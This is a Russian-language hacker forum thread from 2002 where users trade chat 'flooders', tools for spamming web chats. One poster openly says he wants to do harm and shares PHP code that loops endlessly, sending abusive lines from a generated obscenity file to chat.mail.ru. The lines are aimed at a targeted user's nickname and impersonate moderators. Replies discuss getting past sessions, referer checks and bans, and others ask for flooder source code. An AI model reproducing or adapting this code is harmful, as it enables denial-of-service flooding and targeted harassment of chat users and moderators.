Чаты ФЛУД

Discussion in 'Веб-уязвимости' started by art, 5 Oct 2002.

  1. art

    art New Member

    Joined:
    18 Aug 2002
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    ЧТО ДЕЛАТЬ ЕСЛИ ЧАТ НЕ ЛОМАЕТСЯ [​IMG] А ВРЕДИТЬ ХОЧЕТСЯ !!!

    КОЛЛЕГИ, А ПОЧЕМУ БЫ НАМ НЕ ПОГОВОРИТЬ О ХОРОШЕМ ФЛУДЕ (Я НЕ ИМЕЮ ВВИДУ ГАВНО-ПРИМИТИВ ТИПА ОТ MAGNUM НА 60 ЧАТОВ И ДРУГОЙ ПОДОБНОЙ ПАРАШИ КОТОРОЙ ИНЕТ ПОЛОН - ЭТО ДЛЯ КОНКРЕТНЫХ ЛАМЕРОВ)...................

    Я ПРИЗЫВАЮ ПРОДВИНУТЫХ ОБМЕНЯТЬСЯ ОПЫТОМ.........
    Я МОГУ РАССКАЗАТЬ КАК СДЕЛАТЬ CGI-СКРИПТ, НАПРИМЕР НА РНР, КОТОРЫЙ СЧИТЫВАЕТ НИКИ (СТРОКИ) ТЕКСТОВОГО ФАЙЛА ГЕНЕРИРУЕМОГО К ПРИМЕРУ МАТОГЕНЕРАТОРОМ И ПРИТОМ ВЫДАЕТ В ЧАТ БЕЗ ВСЯКИХ ЦИФР (ВСЕ ОЧЕНЬ ПРОСТО), ТАКЖЕ КАК И НИК (КОГО НАДО ОБОСРАТЬ) + ОБСЕРАЛОВО С ТЕКСТОВОГО ФАЙЛА, ТАКЖЕ ГЕНЕРИРОВАНИЕ ОДНОГО И ТОГО ЖЕ КЛОНА БЕЗ ВСЯКИХ ЦИФР С ВЫДАЧЕЙ В ЧАТ (ТИПА МОДЕРАТОР УРОД), И.Т.Д.
    СКРИПТ УНИВЕРСАЛЬНЫЙ РАБОТАЕТ ВЕЗДЕ.......И КОНЕЧНО МОГУ ПОДРОБНО ПОЯСНИТЬ ЧТО НАДО ДЛЯ ЗАПУСКА CGI - СКРИПТОВ (СЦЕНАРИЕВ) И КАК ЕГО ЗАПУСТИТЬ, ПРЕИМУЩЕСТВА.............

    ЕДИНОМЫШЛЕННИКИ - МИЛОСТИ ПРОСИМ.

    КОКРЕТНЫМ ЛАМЕРАМ С ПРОСЬБОЙ ДАТЬ ПРОГУ НЕ ОБРАЩАТЬСЯ........ЭТО ОБМЕН ИДЕЯМИ И ОПЫТОМ.
     
  2. Choppe

    Choppe New Member

    Joined:
    23 Sep 2002
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Гы , ну прогу ты мне дал а вот опытом по ходу плохо поделился (ник Дебил в чате кКиШей) так что делись!! ыы
     
  3. art

    art New Member

    Joined:
    18 Aug 2002
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Choppe че конкретно я тебе дал и в каком чате?

    Напиши адрес чата.
     
  4. Choppe

    Choppe New Member

    Joined:
    23 Sep 2002
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    korol.chatzone.ru на этом чате! Прога нюк 7 называеца, а в качестве флуда тама реклама всякая !!!
     
  5. e-mail

    e-mail New Member

    Joined:
    13 Aug 2002
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Вышли мне прогу сюда: [email protected], я ее потестирую.
    После получения проги и хэлпу к нему, я вышлю тебе мою прогу. Сверим, чьЯ лучще..) жду прогу..
     
  6. art

    art New Member

    Joined:
    18 Aug 2002
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Не надо просить выслать прогу......Это обмен  опытом и идеями.
    Я не нуждаюсь в бета - тестерах все прекрасно пашет и на бешенной скорости.

    Пишите что есть у вас, а там будем меняться........

    А демонстрацию можно устроить в любом чате по договоренности.

    Для новичков я могу просто описать алгоритмы если кто заинтересуеться....
     
  7. Choppe

    Choppe New Member

    Joined:
    23 Sep 2002
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Вот вроде послал!!!!!!! Сматри и наслаждайся флудом!
     
  8. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    2art
    Каким образом реализуется передача пакетов чату ?
     
  9. art

    art New Member

    Joined:
    18 Aug 2002
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Алгол привет...

    Пакеты отправляются в чат методом GET (конечно можно и POST, но в этом нет необходимости, т.к. мы не шлем большого количества информации ).
    Принцип таков: сначала генерируем текстовой файл, затем построчно его считываем и отправляем в чат.......

    Формирование пакетов: Привожу отрывок кода на РНР на примере www.chat.mail.ru (самый простой, без всяких графических интерфейсов и других прибамбасов, что бы понять смысл и воплотить это на любом другом языке...)

    $n="";
    /* в переменную $n вводишь ник чела которого надо обосрать, можно и ничего не вводить, тогда в чат пойдет просто строки сгенерируемого тобой файла с обсераловом */

    $col=urlencode("");
    // тут вводим цвет ника.строки, к примеру "#ff0000"

    $chan=urlencode("название темы");
    /* тут вводишь любую тему в чате, а заодно и URL-кодируем чтоб избежать эксцессов с символами  */

    $f=fopen("путь к текст.файлу для отправки в чат", "r") or die ("Ошибка в открытии файла");
    /*сюда вводится путь к файлу с никами или другим дерьмом (сгенерируемым к примеру матогенератором) для отправки в чат; функция fopen() открывает файл в режиме "r" - означает что файл открывается тока для чтения и возвращает дескриптор открытого файла, в случае если файл не найден возвращается false и
    выдается предупреждение */

    $x=0;
    while(!feof($f))
    // положение указателя текущей позиции, если конец файла не достигнут - продолжается цикл
    {
    $dat[x]=fgets($f,1024);
    /* функция построчного чтения из файла, 1024 max длина строки - можно и не указывать, по умолчанию равна этой величине */
    $x++; // операция инкремента на 1  [​IMG]
    }

    // далее идет цикл формирования-HTTP requests
    $y=1;
    while (true)
    {
    $z=rand(0,$x);
    /* извлечение случайной сроки из файла, можно использовать функцию mt_rand(), другую конструкцию, а можно вообще опустить, тогда строки из файла будут
    считываться подряд  */

    $s="$n$dat[$z]";
    /* окончательно формируем строку, которую будем посылать в nick=....; если написать так $s="$n$dat[$z]$y" - то будут выводится и цифры в конце ника, но это нах не надо */

    $s=urlencode($s);
    // URL-кодируем $s="ник атакуемого + обсералово из файла"

    if (!$c=fsockopen("chat.mail.ru",8001))
    echo "Connection to Chat Server failed";
    /* функция fsockopen() устанавлевает сетевое соединение с указанным хостом и программой, закрепленной на нем за указанным портом, в данном случае порт: 8001; она работает аналогично fopen(), но позволяет "добраться" и до заголовков.....Если соединение не установлено выводиться сообщение */

    fputs($c,"/GET /start.html?nick=$s&color=$col&channel=$chan HTTP1.1\n\n");
    /* функция fputs() добавляет строку "/GET...." в переменную $c и посылает запрос */
    $y++; // операция инкремента опять [​IMG]
    fclose($c); // отключаемся от сервера
    }

    Вот в принципе и все.....
    Как я упоминал до этого, здесь приведен самый простой вариант кода без графического интерфейса, без конструкций типа switch case в выборе цвета, темы, других хороших прибамбасов......

    Так же в этом коде не влкючен алгоритм посылки одного и того же ника в чат без цифр, принцип его заключается в переборе всех возможных вариантов по замене русских и английских букв в строке посылаемой в чат, притом
    спецсимволы типа "­" не используются, т.к. символ & кое-где не проходит. К примеру ник "Толпа Модераторов" генерируется более 100 раз....Это реализуется путем сопоставлений и замен с использованием регулярных выражений языка RegEx или PCRE (Perl-Compatible Regular Expression). Просто уже ламает писать......

    (Алгол насколько я понимаю твоя прога InetCrack написана на Делфи, так вот если заинтересуешся, я те пришлю этот алгоритм специально на Делфи, чтоб было проще, реализован он моим одним коришем, т.к. я не силен в Делфи).

    Насколько вы поняли данный скрипт можно модифицировать как хочешь: можно модифицировав заголовок просто флудить от ника сообщениями, а можно от нескольких ников, типа заходит один чего-то говорит и уходит, затем другой то же самое, третий и.т.д., для этого надо добавить функцию отлова HTTP-responces с сервака чата, взять оттуда ID юзера, модифицировать очередной запрос......
    Не ну ламает писать......(да и секреты всем выдавать не хочеться сам понимаешь, может быть когда-нибудь потом
    щас нет времени)

    Спасибо за внимание.
     
  10. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Пакеты отправляются в чат методом GET (конечно можно и POST, но в этом нет необходимости, т.к. мы не шлем большого количества информации ).[/QUOTE]<span id='postcolor'>
    Дык дело не в том сколько информации мы шлем, а в том, в каком виде сервер информацию принимает )).

    По поводу программы есть следующие замечания:
    1)Насколько я понял, для каждого чата ты предлагаешь писать отдельную програмку ?
    2)Программа будет работать только в том случае, если ты предварительно залогинишся в чате. Сама она не логинится.
    3)Программа написана на &nbsp;PHP и следовательно выполняется на сторне сервера. Если ты залогинишся в чате со своей машины, а программу запустишь на удаленном сервере, то она работать просто не будет, поскольку IP запросов не будут совпадать с IP залогинившегося юзера.
    4)Программа не поддерживает режима аутентификации (есть такие чаты, в которых логинишся через этот режим). 5)Нет модификации поля referer. Следовательно чаты , которые отслеживают referer не будут воспринимать запросы программы.
    6) В большинстве современных чатов принята система идентификации юзеров с помощью номера сессии, который генерится сервером каждый раз когда юзер заходит в чат. Ты предлагаешь вставлять номер сессии вручную в программу после каждого захода в чат?
    7)Программа не имеет защиты от бана. Админу достаточно забанить твой IP или ник, и программа уже работать не будет.
    8) В некоторых чатах принята система номеров сообщений (например некоторые html чаты на www.zerkalo.com). После каждой реплики, ядро присылает тебе новый идентификатор, который ты должен отослать в следующем сообщении. Твоя прога это не поддерживает.

    И еще есть масса нюансов. Так что говорить об универсальности программы пожалуй рановато [​IMG])

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">спецсимволы типа &quot;&amp;shy;&quot; не используются, т.к. символ &amp; кое-где не проходит. [/QUOTE]<span id='postcolor'>
    А никто не заставляет посылать символьное ИМЯ этого символа, нужно посылать САМ символ.
     
  11. art

    art New Member

    Joined:
    18 Aug 2002
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    ЭТО НЕ ПОЛНАЯ ПРОГА, А ПРИМЕР ЧАСТИ КОДА
     
  12. art

    art New Member

    Joined:
    18 Aug 2002
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    Re: Algol

    КОНЕЧНО НЕТ Я НЕ ПРЕДЛАГАЮ МОДИФИЦИРОВАТЬ ЗАГОЛОВКИ ДЛЯ КАЖДОГО ЧАТА ТЫ ПРОСТО НЕПРАВИЛЬНО ПОНЯЛ......
    КАК Я УПОМИНАЛ ДО ЭТОГО, ЭТО НЕ ПРОГА, А ВСЕГО ЛИШЬ ПРИМЕР ЧАСТИ КОДА В ПРОСТОМ ВАРИАНТЕ ИЗ ПРОГИ ЧТО БЫ ОТВЕТИТЬ НА ЗАДАННЫЙ ВОПРОС КАК ФОРМИРУЮТСЯ ПАКЕТЫ В ЧАТ , ТОЛЬКО И ВСЕГО..............

    САМ КОД ГОРАЗДО БОЛЬШЕ И СОДЕРЖИТ ПОЧТИ ВСЕ НЕОБХОДИМЫЕ ФУНКЦИИ КОТОРЫЕ ТЫ УПОМИНАЛ И ЛОГИНИТСЯ + ГРАФИЧЕСКИЙ ИНТЕРФЕЙС + ВОЗМОЖНОСТЬ ВЫБОРА ЧАТА (КАК У МАГНУМА) + ПЕРЕБОР И ЗАСЫЛКА ОДНОГО И ТОГО ЖЕ НИКА БЕЗ ЦИФИРЕЙ.............ПРОСТО Я НЕ СТАЛ ВСЕ ЭТО ОПИСЫВАТЬ ( ПО ПОВОДУ НОМЕРОВ СЕССИЙ Я УКАЗЫВАЛ ЧТО ПРОГА ПЕРЕХВАТЫВАЕТ ОТВЕТЫ ОТ СЕРВАКА ЧАТА И ГЕНЕРИРУЕТ НОВЫЙ ЗАПРОС ЕСЛИ НАДО СДЕЛАТЬ ТАК ЧТОБЫ КРОМЕ ПОСЫЛКИ В ЧАТ НИК ФЛУДА &nbsp;ЕЩЕ И ЧЕ-НИТЬ ВЯКАЛ ТИПА &quot;ВСЕ ВЫ......&quot; ПРАВДА ЭТО ЕЩЕ В ПРОЦЕССЕ ПОСТОЯННОЙ ДОДЕЛКИ - ГРОМОЗДКИЙ КОД....)

    ДА КОНЕЧНО ОНА ЗАПУСКАЕТСЯ НА СТОРОНЕ СЕРВАКА, ДЛЯ ЭТОГО НАДО ПОСТАВИТЬ НА СВОЙ КОМПЮ ВИРТ. СЕРВЕР ТИПА APACHE ИЛИ IIS + РНР (ПО КРАЙНЕЙ МЕРЕ БУДЕТ ПОЗЫВ ДЛЯ ЧЕЛА ПОЧИТАТЬ ОБ АДМИНИСТРИРОВАНИИ И КОНФИГУРАЦИИ СЕРВАКОВ, ВСЯК ПОЛЬЗА [​IMG] ) ИЛИ КИНУТЬ НА БЕСПЛАТНЫЙ ХОСТИНГ И ОТТУДА ЗАПУСКАТЬ.....

    КОНЕЧНО ЕСТЬ И НЕДОСТАТКИ СОГЛАСЕН, РАБОТАЕМ (АДМИНЫ НЕ СПЯТ [​IMG] )...........
     
  13. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">ПЕРЕХВАТЫВАЕТ ОТВЕТЫ ОТ СЕРВАКА ЧАТА И ГЕНЕРИРУЕТ НОВЫЙ ЗАПРОС[/QUOTE]<span id='postcolor'>
    Тогда я не понимаю как она определяет что, как и куда нужно вставить, в каком виде отсылать запрос ядру, где именно номер сессии и т.п.
    Даже если делать вручную, и то нужно покопаться что бы найти что и как...
     
  14. Guest

    Guest Guest

    Reputations:
    0
    Art -&gt;&gt;
    Не мог бе мне отослать свой флудер? Я взамен тебе могу дать флудер для гостевых, который написан мною. Хорошо?
     
  15. Guest

    Guest Guest

    Reputations:
    0
  16. Guest

    Guest Guest

    Reputations:
    0
    или может те, у кого есть исходники запостит их сюда?
     
  17. Nemez

    Nemez New Member

    Joined:
    19 Dec 2003
    Messages:
    47
    Likes Received:
    0
    Reputations:
    0
    Na moj vzgljad samij ludshij fluder eto recorder [​IMG] On zapisevaet dvizhenija mishki i klavi a potom vsjo eto povtorjaesh po 1000 raz [​IMG] lol
     
  18. Guest

    Guest Guest

    Reputations:
    0
    Скрипт можно залить на хость, а флуд оттуда будет не детский сообщений 5 в минуту
     
  19. Guest

    Guest Guest

    Reputations:
    0
    точнее 5 в секунду очепятка [​IMG]
     
  20. Guest

    Guest Guest

    Reputations:
    0
    У кого есть флудеры чатов\гостевых на пхп, перл, киньте сюда. Хорошо?